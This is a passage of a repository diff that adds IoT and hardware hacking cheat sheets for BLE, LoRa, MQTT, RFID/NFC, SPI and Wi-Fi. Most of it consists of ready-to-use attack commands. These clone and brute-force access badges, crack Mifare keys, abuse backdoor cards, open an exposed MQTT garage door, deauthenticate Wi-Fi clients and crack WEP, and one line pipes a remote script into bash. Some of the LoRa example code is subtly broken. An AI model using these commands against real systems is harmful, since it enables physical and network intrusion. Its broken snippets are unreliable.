.configure --enable-library
make -j8 && sudo make install
sudo cp attrib/gatttool /usr/local/bin/
```
### Enumerate services and characteristics
> BLE is based on specification called General Attribute profile (GATT), that defines how communication/data transfer between client and server.
```powershell
sudo apt-get install git build-essential libglib2.0-dev python-setuptools
git clone https://github.com/IanHarvey/bluepy.git
cd bluepy
python setup.py build
sudo python setup.py install
git clone git clone https://github.com/hackgnar/bleah
cd bleah
python setup.py build
sudo python setup.py install
sudo bleah -b $MAC -e
```
Using bettercap
```powershell
sudo bettercap -eval "net.recon off; events.stream off; ble.recon on"
ble.show
ble.enum 04:52:de:ad:be:ef
```
Using expliot
```powershell
# List of Services
run ble.generic.scan -a <mac address> -s
# List of characteristics
run ble.generic.scan -a <mac address> -c
```
Using gatttool, we can enumerate the services and their characteristics, use `sudo gatttool -b $MAC -I` to have an interactive gatttool shell:
* Services: They are set of provided features and associated behaviors to interact with the peripheral. Each service contains a collection of characteristics.
* Characteristics: Characteristics are defined attribute types that contain a single logical value
```powershell
MAC=30:AE:A4:2A:54:8A
$ gatttool -b $MAC --primary
attr handle = 0x0001, end grp handle = 0x0005 uuid: 00001801-0000-1000-8000-00805f9b34fb
attr handle = 0x0014, end grp handle = 0x001c uuid: 00001800-0000-1000-8000-00805f9b34fb
attr handle = 0x0028, end grp handle = 0xffff uuid: 000000ff-0000-1000-8000-00805f9b34fb
# Services whose UUID start with 00001801 and 00001800 are special values defined in the norm
# The other is a custom one which holds the CTF
$ gatttool -b $MAC --characteristics
handle = 0x0002, char properties = 0x20, char value handle = 0x0003, uuid = 00002a05-0000-1000-8000-00805f9b34fb
handle = 0x0015, char properties = 0x02, char value handle = 0x0016, uuid = 00002a00-0000-1000-8000-00805f9b34fb
```
### Read BLE data
Read data with gatttool
```powershell
$ sudo gatttool -b $MAC -I
[00:1A:7D:DA:71:06][LE]> connect
# list characteristics
[00:1A:7D:DA:71:06][LE]> characteristics
handle: 0x000b, char properties: 0x0a, char value handle: 0x000c, uuid: 4b796c6f-5265-6e49-7342-61644a656469
# read characteristic at char handle
[00:1A:7D:DA:71:06][LE]> char-read-hnd 0x000c
Characteristic value/descriptor: 44 65 63 72 79 70 74 20 74 68 65 20 6d 65 73 73 61 67 65 2c 20 77 72 69 74 65 20 74 68 65 20 64 65 63 72 79 70 74 65 64 20 76 61 6c 75 65 20 61 6e 64 20 72 65 61 64 20 62 61 63 6b 20 74 68 65 20 72 65 73 70 6f 6e 73 65 20 74 6f 20 66 6c 61 67 2e 20 45 6e 63 72 79 70 74 65 64 20 6d 65 73 73 61 67 65 3a 20 63 34 64 33 32 38 36 35 37 61 39 64 62 33 64 66 65 39 31 64 33 36 36 36 62 39 34 31 62 33 36 31
# one liner
$ gatttool -b $MAC --char-read -a 0x002a|awk -F':' '{print $2}'|tr -d ' '|xxd -r -p;printf '\n'
```
### Read BLE notification/indication
```powershell
$ gatttool -b $MAC -a 0x0040 --char-write-req --value=0100 --listen
$ gatttool -b $MAC -a 0x0044 --char-write-req --value=0200 --listen
```
### Write BLE data
Write data with bettercap
```powershell
ble.recon on
ble.write 04:52:de:ad:be:ef 234bfbd5e3b34536a3fe723620d4b78d ffffffffffffffff
```
Write data with gatttool
```powershell
$ gatttool -b $MAC --char-write-req -a 0x002c -n $(echo -n "12345678901234567890"|xxd -ps)
# With char-write, we perform a Write Command and don't expect a response from the server
# With char-write-req, we perform a Write Request and expect a response from the server
$ gatttool -b $MAC -a 0x0050 --char-write-req --value=$(echo -n 'hello' | xxd -p)
# inside gatttool shell
[00:1A:7D:DA:71:06][LE]> char-write-req 0x000c 476f6f64205061646177616e21212121
[00:1A:7D:DA:71:06][LE]> char-read-hnd 0x000c
Characteristic value/descriptor: 43 6f 6e [...] 2e
```
### Change Bluetooth MAC
```powershell
$ bdaddr -r 11:22:33:44:55:66
$ gatttool -I -b E8:77:6D:8B:09:96 -t random
```
### Sniff Bluetooth communication
#### Using Ubertooth
:warning: You need 3 ubertooth.
```powershell
ubertooth-btle -U 0 -A 37 -f -c bulb_37.pcap
ubertooth-btle -U 1 -A 38 -f -c bulb_38.pcap
ubertooth-btle -U 2 -A 39 -f -c bulb_39.pcap
```
#### Using Micro::Bit
* https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEF%20CON%2025%20-%20Damien-Cauquil-Weaponizing-the-BBC-MicroBit.pdf
#### Using Android HCI
Enable the Bluetooth HCI log on the device via Developer Options—also from the SDK, there is a helpful tool called the **Bluetooth HCI snoop log** (available after version 4.4)
> It works like a hook in the stack to capture all the HCI packets in a file. For most Android devices, the log file is at /sdcard/btsnoop\_hci.log or /sdcard/oem\_log/btsnoop/
```powershell
$ adb pull /sdcard/oem_log/btsnoop/<your log file>.log
```

3
docs/protocols/gps.md Normal file
View File

@ -0,0 +1,3 @@
# GPS
TODO

4
docs/protocols/http.md Normal file
View File

@ -0,0 +1,4 @@
# HTTP
* HTTPS Proxy: Burp Suite, MITM Proxy, Fiddler
* Network Sniffer: Wireshark, tcpdump

3
docs/protocols/i2c.md Normal file
View File

@ -0,0 +1,3 @@
# I2C
TODO

137
docs/protocols/lora.md Normal file
View File

@ -0,0 +1,137 @@
# LoRa
### LoRa with Arduino on 868.1MHZ
[arduino-LoRa](https://github.com/sandeepmistry/arduino-LoRa)\
use 868.1MHZ with SpreadFactor 10
```c
#include <SPI.h>
#include <LoRa.h>
void setup() {
Serial.begin(9600);
while (!Serial);
Serial.println("LoRa Receiver");
if (!LoRa.begin(868.1E6)) {
Serial.println("Starting LoRa failed!");
while (1);
}
LoRa.setSpreadingFactor(10);
}
void onReceive(int packetSize) {
Serial.print("packet recv\n");
// read packet
for (int i = 0; i < packetSize; i++) {
Serial.print((char)LoRa.read());
}
}
void loop() {
LoRa.receive();
LoRa.onReceive(onReceive);
}
```
### Bruteforce all the EU frequencies and the SpreadFactor
```c
#include <SPI.h>
#include <LoRa.h>
float freq[5] = { 868.3E6, 868.5E6, 867.1E6, 867.5E6, 867.7E6, 867.9E6 };
void setup() {
Serial.begin(9600);
while (!Serial);
Serial.println("LoRa Receiver");
if (!LoRa.begin(868.1E6)) {
Serial.println("Starting LoRa failed!");
while (1);
}
LoRa.setSpreadingFactor(10);
}
void onReceive(int packetSize) {
Serial.print("packet recv\n");
// read packet
for (int i = 0; i < packetSize; i++) {
Serial.print((char)LoRa.read());
}
}
void loop() {
LoRa.receive();
LoRa.onReceive(onReceive);
delay(5000);
While(1) {
int i;
for(i=0; i < 5 ; i++)
{
LoRa.setFrequency(freq[i]);
int j;
for(j=7; j <= 12; j++)
{
// loop on spreading factor is finish, set new freq
LoRa.setSpreadingFactor(i);
delay(5000);
}
}
}
}
```
### Display RSSI of the packet
> The Received Signal Strength Indication (RSSI) is the received signal power in milliwatts and is measured in dBm.
The RSSI is measured in dBm and is a negative value.\
The closer to 0 the better the signal is.
Typical LoRa RSSI values are:
* RSSI minimum = -120 dBm.
* If RSSI=-30dBm: signal is strong.
* If RSSI=-120dBm: signal is weak.
```c
#include <SPI.h>
#include <LoRa.h>
void setup() {
Serial.begin(9600);
while (!Serial);
Serial.println("LoRa Receiver");
if (!LoRa.begin(867.1E6)) {
Serial.println("Starting LoRa failed!");
while (1);
}
LoRa.setSpreadingFactor(8);
}
void onReceive(int packetSize) {
Serial.print("packet recv\n");
int rssi = LoRa.packetRssi();
Serial.print(rssi);
}
void loop() {
LoRa.receive();
LoRa.onReceive(onReceive);
delay(1000);
}
```

50
docs/protocols/mqtt.md Normal file
View File

@ -0,0 +1,50 @@
# MQTT
### Discovery
MQTT client:
* mqtt-spy
* [MQTT CLI](https://asciinema.org/a/DlPmJwXbhuAURHseamGdMy4z3/embed?speed=2\&autoplay=true)
* [MQTT Lens](https://chrome.google.com/webstore/detail/mqttlens/hemojaaeigabkbcookmlgmdigohjobjm)
* MQTT.fx
* mosquitto\_tools
Scan an MQTT with nmap : `nmap -p 1883 -vvv --script=mqtt-subscribe -d sensors.domain.com`
```powershell
mosquitto_sub -h sensors.domain.com -t '#'
mosquitto_sub -h sensors.domain.com -t '+'
mosquitto_sub -h sensors.domain.com -t "/sensor/"
```
### Explore MQTT
Connect and subscribe to every topics using the `#` keyword.
```python
import paho.mqtt.client as mqtt
def on_connect(client, userdata, flags, rc):
print "[+] Connection successful"
client.subscribe('#', qos = 1) # Subscribe to all topics
client.subscribe('$SYS/#') # Broker Status (Mosquitto)
def on_message(client, userdata, msg):
print '[+] Topic: %s - Message: %s' % (msg.topic, msg.payload)
client = mqtt.Client(client_id = "MqttClient")
client.on_connect = on_connect
client.on_message = on_message
client.connect('SERVER IP HERE', 1883, 60)
client.loop_forever()
```
Send MQTT requests
```python
import paho.mqtt.client as mqtt
def on_connect(client, userdata, flags, rc):
print "[+] Connection success"
client = mqtt.Client(client_id = "MqttClient")
client.on_connect = on_connect
client.connect('IP SERVER HERE', 1883, 60)
client.publish('smarthouse/garage/door', "{'open':'true'}")
```

500
docs/protocols/rfid-nfc.md Normal file
View File

@ -0,0 +1,500 @@
# RFID NFC
### Install and configuration
Dependencies to install first :\
`sudo apt-get install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib ncurses-dev libpcsclite-dev pcscd`
Cloning and building the tool.
```powershell
git clone https://github.com/Proxmark/proxmark3.git
cd proxmark3
make clean && make all
dmesg | grep -i usb
~/proxmark3/client/proxmark3 /dev/ttyACM0
```
* Ubuntu : `curl https://raw.githubusercontent.com/daveio/attacksurface/master/proxmark3/pm3-setup.sh | bash`
* Kali : `Same script should work, just replace Ubuntu 14.04 by Kali`
Testing the tool with the commands `hw tune` and `hw version`.
```powershell
proxmark3> hw tune
Measuring antenna characteristics, please wait.........
# LF antenna: 73.70 V @ 125.00 kHz
# LF antenna: 59.12 V @ 134.00 kHz
# LF optimal: 73.97 V @ 126.32 kHz
# HF antenna: 29.32 V @ 13.56 MHz
proxmark3> hw version
Prox/RFID mark3 RFID instrument
uC: AT91SAM7S256 Rev D
Embedded Processor: ARM7TDMI
```
If the `ACR122` doesn't work properly, try `sudo rmmod pn533_usb`
#### Update and flash
In order to update and flash your proxmark you have to kill the `ModemManager` process as it is interfering with the process.
```powershell
ps -aux | grep ModemManager
kill [pid] - on my system stable 521
```
By default the compilation makefile will target the Proxmark rdv4, to make a firmware and boot image for the Proxmark3 Easy you need to edit the `Makefile.platform` from `PLATFORM=PM3RDV4` to `PLATFORM=PM3OTHER`.
| PLATFORM | DESCRIPTION |
| ------------- | ------------------------ |
| PM3RDV4 (def) | Proxmark3 rdv4 |
| PM3OTHER | Proxmark3 generic target |
The compilation steps are as follows.
```powershell
make armsrc/obj/fullimage.elf bootrom/obj/bootrom.elf client/flasher
./client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf armsrc/obj/fullimage.elf
```
### Notes about card types
* **MIFARE Classic 1K/4K**: basically just a memory storage device. This memory, either 1024 or 4096 bytes, is divided into sectors and blocks. Most of the time used for regular access badges and has really simple security mechanisms for access control
* **MIFARE Ultralight**: a 64 bytes version of MIFARE Classic. Its low costs make it widely used as disposable tickets for events or transportation.
* **MIFARE Plus**: announced as a replacement of MIFARE Classic. The Plus subfamily brings the new level of security up to 128-bit AES encryption.
* **MIFARE DESFire**: those tags come pre-programmed with a general purpose DESFire operating system which offers a simple directory structure and files, and are the type of MIFARE offering the highest security levels.
### LF - HID & Indala
> Cloning requires writable T55xx card. The T55x7 card can be configured to emulate many of the 125 kHz tags.
```powershell
lf search # HID Prox TAG ID: 2004263f88
lf hid fskdemod # (Push the button on the PM3 to stop scanning - not necessary)
lf hid demod # (Push the button on the PM3 to stop scanning - not necessary)
lf hid clone 2004263f88 # (id à cloner)
lf hid sim 200671012d # simulate HID card with UID=200671012d
lf indala read
lf indala demod
lf indala sim a0000000c2c436c1 # simulate Indala with UID=a0000000c2c436c1
lf indala clone a0000000c2c436c1 # clone Indala to T55x7 card
lf hitag info
lf hitag sim c378181c_a8f7.ht2 # simulate HiTag
```
### LF - EM410X
Read only memory :/
```powershell
Proxmark> lf em4x em410xread
EM410x Tag ID: 23004d4dee
Proxmark> lf em4x em410xsim 23004d4dee
```
### HID : Example - Card
#### HID card format
```powershell
proxmark3> lf hid decode 10001fc656
--------------------------------------------------
Format: H10302 (HID H10302 37-bit huge ID)
Card Number: 1041195
Parity: Valid
--------------------------------------------------
Format: H10304 (HID H10304 37-bit)
Facility Code: 1
Card Number: 516907
Parity: Valid
--------------------------------------------------
```
#### Write an HID card
```powershell
# version with facility code is better
proxmark3> lf hid encode H10304 f 49153 c 516907
HID Prox TAG ID: 1c001fc656
proxmark3> lf hid encode H10302 c 1041195
HID Prox TAG ID: 10001fc656
-------------------------------------------------
```
Example 2
```powershell
proxmark3> lf hid decode 1c0006bb43
--------------------------------------------------
Format: H10302 (HID H10302 37-bit huge ID)
Card Number: 220577
Parity: Valid
--------------------------------------------------
Format: H10304 (HID H10304 37-bit)
Facility Code: 49152
Card Number: 220577
Parity: Valid
--------------------------------------------------
proxmark3> lf hid encode H10302 c 220577
HID Prox TAG ID: 100006bb43
```
#### Bruteforce an HID reader
```powershell
pm3 --> lf hid brute a 26 f 224
pm3 --> lf hid brute v a 26 f 21 c 200 d 2000
Options
---
a <format> : 26|33|34|35|37|40|44|84
f <facility-code> : 8-bit value HID facility code
c <cardnumber> : (optional) cardnumber to start with, max 65535
d <delay> : delay betweens attempts in ms. Default 1000ms
v : verbose logging, show all tries
```
### HF - Mifare DESFire
> No known attacks yet ! Unencrypted sectors can be read, also you can try to look for default keys. All MIFARE cards are prone to relay attack.
* Mifare DESFire [MF3ICD40](https://arstechnica.com/information-technology/2011/10/researchers-hack-crypto-on-rfid-smart-cards-used-for-keyless-entry-and-transit-pass/): uses Triple DES encryption, product discontinued.
```powershell
It requires the attacker to have the card itself, an RFID reader, and a radio probe.
Using differential power analysis, data is collected from radio frequency energy
that leaks out of the card (its “side channels”).
```
* Mifare DESFire EV1 : the challenge is done with AES or 3DES.
* Mifare DESFire EV2
### HF - Mifare Ultra Light
* Ultralight C (3DES authentication)
* Ultralight EV1
* NTAG2
#### Chinese backdoor
```powershell
pm3 --> hf 14a raw -p -b 7 40
pm3 --> hf 14a raw -p 43
pm3 --> hf 14a raw -p -c a20059982120
0x40, init backdoor mode
0x41, wipe fills card with 0xFF
0x42, fills card with 0x00
0x43, no authentication needed. issue a 0x3000 to read block 0, or write block.
0x44, fills card with 0x55
```
#### Simulate
```powershell
hf 14a sim 2 <7-byte tag>
```
### HF - Mifare Classic 1k
New method for Proxmark : `hf mf autopwn`
#### Darkside attack (PRNG Weak)
**Proxmark method**
```powershell
pm3> hf search
pm3> hf mfu
pm3> hf mf darkside (fork command)
pm3> hf mf mifare (original command)
Parity is all zero. Most likely this card sends NACK on every failed authentication. # Card is empty...
or
Found valid key:ffffffffffff # KEY_FOUND
pm3> hf mf chk 0 A KEY_FOUND (Check Found Key On Block 0 A)
```
**ACR122u method**
```powershell
# start cracking the first key of the first sector.
mfcuk -C -R 0:A -v 3 -s 250 -S 250
mfcuk -C -R 3:A -v 3 -s 250 -S 250 -o mycard.mfc
```
#### Nested attack (PRNG Weak)
> Need to find a default key to extract the others
**Proxmark method**
```powershell
hf search
hf mf chk 1 ? t # "Test Block Keys" command which will test the default keys for us
hf mf nested 1 0 A a0a1a2a3a4a5 t. # "Nested Attack" use the key a0a1a2a3a4a5, keeping the key in memory with "t"
hf mf chk * ? # "Test Block Keys" command which will test the default keys for us
hf mf nested 1 0 A ffffffffffff d # "Nested Attack" use the key ffffffffffff to extract the others (file:dumpkeys.bin)
hf mf dump 1 # Dump content
hf mf restore 1 # Restore content into the card
hf mf wrbl 5 A 080808080808 32110000cdeeffff3211000005fa05fa # write on block 5, with the key 0808... the content 3211...
hf mf rdbl 5 A 080808080808 # Read block 5 with the keu 0808..
python pm3_mfd2eml.py dumpdata.bin dumpdata.eml
pm3> hf mf cload dumpdata
```
**ACR122u method**
```powershell
nfc-list
mfoc -O card.mfd # dump the memory of the tag
# Le paramètre P permet de spécifier le nombre de sondes par secteur. Par défaut, ce nombre est à 20 mais nous pouvons le passer à 500.
mfoc -P 500 -O dump_first_try.dmp
nfc-mfclassic w a key.mfd data.mfd # write data
nfc-mfclassic W a key.mfd data.mfd # write data and sector 0
```
#### Hardnested attack
> One key is needed in order to use this attack
For newest MIFARE Classic and MIFARE Plus SL1
**Proxmark method**
:warning: NOTE: These hardware changes resulted in the Proxmark 3 Easy being incapable of performing several of the Proxmark's advanced features, including the Mifare Hard-Nested attacks. In other word you need a real Proxmark, not a cheap chinese copy.
```powershell
# find a default key
# res column is either equal to 1 or 0.
# A 1 in the column means the key was valid for that sector.
hf mf chk *1 ? t
# <block number> <key A|B> <key (12 hex symbols)>
# <target block number> <target key A|B> [known target key (12 hex symbols)] [w] [s]
# w: Acquire nonces and write them to binary file nonces.bin
hf mf hardnested 0 A 8829da9daf76 4 A w
# then https://github.com/aczid/crypto1_bs
./solve_piwi 0xcafec0de.bin
./solve_piwi_bs 0xcafec0de.bin
```
**ACR122u method**
With the key n°A a0a1a2a3a4a5 for sector 0 and we want key n°A for sector 1. This method can be reused for every sectors.
```powershell
./libnfc_crypto1_crack a0a1a2a3a4a5 0 a 4 a
Found tag with uid 62ef9e5a, collecting nonces for key A of block 4 (sector 1) using known key A a0a1a2a3a4a5 for block 0 (sector 0)
Collected 2379 nonces... leftover complexity 23833993588 (~2^34.47) - initializing brute-force phase...
Starting 4 threads to test 23833993588 states using 256-way bitslicing
Cracking... 88.93%
Found key: c44e2b5e4ce3
Tested 21232975852 states
```
#### Magic Chinese Card - Acronyms
**UID** - The original Chinese Magic Backdoor card. These cards respond to the backdoor commands and will show Chinese magic backdoor commands (GEN 1a) detected when you do an hf search. These cards can be detected by probing the card to see if it responds to the backdoor commands. Some RFID systems may try to detect these cards.
**CUID** - The 2nd generation Chinese Magic Backdoor card. These cards do not use the backdoor commands, but instead allow Block 0 to be written to like any other block on the card. This gives the card better compatibility to be written to from an Android phone. However, some RFID systems can detect this type of card by sending a write command to Block 0, making the card invalid after the first use is attempted.
**FUID** - This type of card is not as common, but allows Block 0 to be written to just once. This allows you to create a clone of a card and any checks done by the RFID system will pass because Block 0 is no longer writable.
**UFUID** - This type of card is apparently a "better" version of the FUID card. Instead of only allowing Block 0 to be written once, you can write to it many times and then lock the block later when you're happy with the result. After locking Block 0, it cannot be unlocked to my knowledge. I do not think there is currently a way to lock these cards using the Proxmark3.
#### Magic Chinese Card - GEN 2
They can be copied directly. The software allows a new UID.
#### Magic Chinese Card - GEN 1a
> **Works better on the official client.py instead of the iceman fork.**
Reset a UID Changeable Magic Card (7 bytes UID) :warning: You should prefer this method !
```powershell
proxmark3> hf mf csetuid 42917CAB 0004 08
uid:42 91 7c ab
--atqa:00 04 sak:08
Chinese magic backdoor commands (GEN 1a) detected
```
To set all the block `hf mf csetblk 0 42917CAB00080400022A2C87933EF21D`
NOTE: The UID from several cards can be computed with the displayed id, e.g: ID is 2910621770.
```python
import struct
struct.pack('<I',2910621770).encode('hex')
'4a907cad'
```
#### Unbricking Chinese Magic Mifare Classic
If you set the wrong BCC for UID and can't read the card anymore, you can use some backdoor commands to change sector 0 using Proxmark:
```powershell
hf 14a raw -a -p -b 7 40
hf 14a raw -p 43
hf 14a raw -p -c a0 00
hf 14a raw -p -c de ad be ef 22 08 04 00 46 59 25 58 49 10 23 02
```
#### Key Bruteforce/Dictionary attack
```powershell
hf mf chk *1 ? t # Default keys
hf mf chk *1 ? d default_keys.dic
hf mf chk 0 A default_keys.dic # Dictionary attack with file: default_keys.dic
```
#### Write and read sectors
> Avoid writing wrbl 3 (contains key A/B + permissions)
```powershell
proxmark3> hf mf wrbl 1 a ffffffffffff 000102030405060708090a0b0c0d0e0f
proxmark3> hf mf wrbl 2 a ffffffffffff 464c4147313a4d31664072335f303037
```
```powershell
hf mf rdsc <sector number> <key A/B> <key (12 hex symbols)>
```
#### Dump Mifare card
```powershell
proxmark3> hf mf dump 1 k hf-mf-A29558E4-key.bin f hf-mf-A29558E4-data.bin
<card memory>: 0 = 320 bytes (Mifare Mini), 1 = 1K (default), 2 = 2K, 4 = 4K
k <name> : key filename, if no <name> given, UID will be used as filename
f <name> : data filename, if no <name> given, UID will be used as filename
```
#### Simulate and emulate Mifare card
Emulate from a dump file
```powershell
# convert .bin to .eml
proxmark3> script run dumptoemul -i dumpdata.bin
proxmark3> hf mf eload <file name w/o .eml>
```
Simulate Mifare 1K UID
```powershell
proxmark3> hf mf sim u 353c2aa6
```
#### MITM attack
```powershell
hf 14a snoop
# read card
# push button
hf list 14a
089220 | 095108 | Tag | 4d xx xx xx d3 | | UID
114608 | 125072 | Rdr | 93 70 4d xx xx xx d3 4f 8d | ok | SELECT_UID
...
525076 | 529748 | Tag | 61 7a 66 18 | | TAG CHALLENGE
540608 | 549920 | Rdr |50! 87! 8e ab 3b! 49 5a 1b | !crc| HALT
551188 | 555860 | Tag |d6! 53! 7c 57! | | TAG RESPONSE
UID: 4dxxxxxxd3
TAG CHALLENGE: 617a6618
READER CHALLENGE: 50878eab
READER RESPONSE: 3b495a1b
TAG RESPONSE: d6537c57
# crapto1gui or mfkey
cd tools/mfkey
make
./mfkey64
./mfkey64 xxxxxxxx 3b45a45a 7ddb6646 142fc1b9 9195fb3f
```
#### Reader only attack
Emulate a MIFARE Classic with a DEADBEEF UID.
```powershell
proxmark3> hf mf sim u deadbeef n 1 x
mf 1k sim uid: de ad be ef , numreads:0, flags:18 (0x12)
#db# Collected two pairs of AR/NR which can be used to extract keyA from reader for sector 1:
#db# ../tools/mfkey/mfkey32 deadbeef 0102xxxx 4d9axxxx 87e7xxxx 06d2xxxx b4a0xxxx
#db# Emulator stopped. Tracing: 1 trace length: 253
#db# 4B UID: deadbeef
```
#### Read a Mifare Dump
```powershell
pip install bitstring
git clone https://github.com/zhovner/mfdread
mfdread.py ./dump.mfd
```
### HF - Mifare Classic 4k
#### Chinese Magic Mifare Classic 4K
Block 0 is writable through normal Mifare Classic commands, i.e. there is not special “unlocked” read/write like in “magic Mifare 1k” version.
Writing block 0 with Proxmark, UID 01020304, using key A being FFFFFFFFFFFF:
```powershell
hf mf wrbl 0 a FFFFFFFFFFFF 01020304040000000000000000000000
```
Again, watch out to have correct BCC and avoid Cascading Tag (0x88) as first byte of UID, or you may make the card unselectable (i.e. brick it).
### HF - Vigik
Tool : https://github.com/cjbrigato/kigiv-for-proxmark3/releases
```powershell
modprobe -r pn533_usb
modprobe -r pn533
nfc-list # Vérifier le bon fonctionnement du lecteur
mfoc -P 500 -O carte-vierge.dmp # Extraire les clés de chiffrement de la puce RFID chinoise dans un fichier
mfoc -P 500 -O carte-originale.dmp # Copiez le contenu de la puce RFID dorigine dans un fichier
nfc-mfclassic W a carte-originale.dmp carte-vierge.dmp # Ecrire le contenu de la puce originale sur la puce chinoise
```
### References
* https://blog.kchung.co/rfid-hacking-with-the-proxmark-3/
* https://aur.archlinux.org/packages/proxmark3/
* https://github.com/Proxmark/proxmark3/wiki/Kali-Linux
* https://github.com/Proxmark/proxmark3/wiki/Mifare-HowTo
* https://www.latelierdugeek.fr/2017/07/12/rfid-le-clone-parfait/
* https://github.com/cjbrigato/kigiv-for-proxmark3/releases
* http://guillaumeplayground.net/proxmark3-hardnested/
* https://www.ordinoscope.net/index.php/Electronique/Hardware/Divers/RFID/Proxmak3/Mf\_(Mifare)
* https://pi3rrot.net/wiki/doku.php?id=rfid:break\_mifare1k\_proxmark3
* https://connect.ed-diamond.com/MISC/MISCHS-016/Proxmark-3-le-couteau-suisse-RFID
* https://blandais.github.io/mifare/fr
* http://www.icedev.se/pm3docs.aspx
* http://www.icedev.se/pm3cmds.aspx
* https://scund00r.com/all/rfid/2018/06/05/proxmark-cheatsheet.html
* https://www.tinker.sh/badge-cloning-clone-hid-prox-with-proxmark3-rvd4/
* https://hackmethod.com/hacking-mifare-rfid/
* https://hackmethod.com/hacking-mifare-rfid-2/
* https://github.com/Proxmark/proxmark3/wiki/Mifare-Tag-Ops
* http://arishitz.net/coffee-nfc-exploit-coffee-again/
* https://thetraaaxx.org/writeup-irl-hacking-le-porte-monnaie-nfc-securise
* https://linuskarlsson.se/blog/acr122u-mfcuk-and-mfoc-cracking-mifare-classic-on-arch-linux/
* https://github.com/RfidResearchGroup/proxmark3/blob/master/doc/cheatsheet.md
* https://smartlockpicking.com/slides/Confidence\_A\_2018\_Practical\_Guide\_To\_Hacking\_RFID\_NFC.pdf

28
docs/protocols/spi.md Normal file
View File

@ -0,0 +1,28 @@
# SPI
### Dump Firmware via SPI
```powershell
sudo raspi-confi > Interface > SPI(P4)
NOTE: might need a press/hold the reset button
# check
sudo flashrom -p linux spi:dev=/dev/spidev0.0,spispeed=1000
# dump
sudo flashrom -p linux spi:dev=/dev/spidev0.0,spispeed=1000 -r dump.bin
```
### SPIFFS
```powershell
$ cd ~/.arduino15/packages/esp32/tools/esptool/2.3.1
$ python ./esptool.py -p /dev/ttyUSB0 -b 460800 read_flash 0x300000 0x0fb000 /tmp/spiffs.bin
$ cd ~/.arduino15/packages/esp32/tools/mkspiffs/0.2.3
$ ./mkspiffs -u /tmp/data -p 256 -b 8192 -s 1028096 /tmp/spiffs/bin
```
### References
* https://www.youtube.com/watch?v=Bn5zajZ4I5E

3
docs/protocols/upnp.md Normal file
View File

@ -0,0 +1,3 @@
# UPnP
TODO

694
docs/protocols/wifi.md Normal file
View File

@ -0,0 +1,694 @@
# Wifi
### Tools
* Wifite - https://github.com/derv82/wifite
* Wifite2 Rewrite - https://github.com/kimocoder/wifite2
* Wifite2 Original - https://github.com/derv82/wifite2
### Linux Wireless Basics
```powershell
AP_MAC="XX:XX:XX:XX:XX" # BSSID
VICTIM_MAC="XX:XX:XX:XX:XX" # VIC
ATTACKER_MAC="XX:XX:XX:XX:XX" # MON
AP_SSID="wifibox" # ESSID
SRC_ADDR="192.168.1.1"
DST_ADDR="192.168.1.255"
```
```powershell
# driver install
apt install realtek-rtl88xxau-dkms
# network card recon
iwconfig
iw list
dmesg | grep 8187 # alfa card
# Increase Wi-Fi TX Power
iw reg set B0
iwconfig wlan0 txpower <NmW|NdBm|off|auto> # txpower is 30 (usually)
# find SSID and channel
iw dev wlan0 scan | grep SSID
iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID"
iwlist wlan0 scanning | egrep "ESSID|Channel"
# monitor mode - start
airmon-ng start wlan0
airmon-ng start wlan0 3 # only on a particular channel e.g: 3
* Manual 1: iw dev wlan0 interface add mon0 type monitor
* Manual 2: iwconfig wlan0 mode monitor channel 3
ifconfig mon0 up
# monitor mode - stop
airmon-ng stop mon0
* Manual 1: iw dev wlan0 interface del mon0
* Manual 2: iwconfig wlan0 mode managed
```
### Aircrack-ng Essentials
```powershell
# check and kill processes that could interfere with our monitor mode
airmon-ng check
airmon-ng check kill
# pkill dhclient; pkill wpa_supplicant; pkill dhclient3
# list AP
airodump-ng mon0
airodump-ng mon0 -c 3 # only on a particular channel e.g: 3
airodump-ng mon0 -c 3 --bssid $AP_MAC -w clearcap # dump traffic
# get our macaddress
macchanger -s mon0
macchanger --show mon0
# replay and accelerate traffic
aireplay-ng
* -i interface
* -r file.pcap
# check aireplay card compatibility
aireplay-ng -9 mon0 -> test injection
aireplay-ng -9 -i wlan1 mon0 -> test card to card injection
# injection rate
iwconfig wlan0 rate 1M
# Aircrack compatibility
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#list_of_compatible_adapters
Alfa AWUS036H / TPLink WN722
```
#### Fake authentication attack
:warning: use it before each attack
```powershell
airodump-ng -c 3 --bssid $AP_MAC -w wep1 mon0
# fake authentication = no arp
aireplay-ng -1 0 -e AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
* Might need a real $ATTACKER_MAC, observe traffic using airodump
> Association successful! :-)
# fake authentication for picky AP
# Send keep-alive packets every 10 seconds
aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>
# might need to fake your MAC ADDRESS first
```
#### Deauthentication attack
> Force ARP packet to be sent.
```powershell
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
* -0 : 1 deauthentication, 0 unlimited
> Sending 64 directed DeAuth.
```
#### ARP Replay Attack
Video: wifu-20.mp4 The attack listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the AP to repeat the ARP packet with a new IV. By collecting enough of these IVs Aircrack-ng can then be used to crack the WEP key.
```powershell
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
* ATTACKER_MAC if fake authentication launched
* CONNECTED_MAC if a client is associated
# x 1000 n 1000 ?
# aireplay-ng -3 x 1000 n 1000 b $AP_MAC -h $ATTACKER_MAC wlan0mon
# wait for ARP on the network
# alternatively you can de-auth some clients
aircrack-ng b <BSSID> <PCAP_of_FileName>
aircrack-ng -0 wep1.cap
* -0 : colored output
```
### Cracking WEP via a Client
#### ARP Request Replay Attack
> Attack the ACCESS POINT
```powershell
airmon-ng start wlan0 3 # only a particular channel : 3
airodump-ng mon0 -c 3 --bssid $AP_MAC -w arpreplay # dump traffic
# Fake authentication for a more reliable attack
aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
# ARP replay attack
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
# Deauthentication
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
# Cracking
aircrack-ng arpreplay.cap
```
#### Interactive replay attack
> Attack a client to force new packets 0841 attack, or interactive packet replay is a WEP attack that allows for packet injection when ARP replay is not available/working.
```powershell
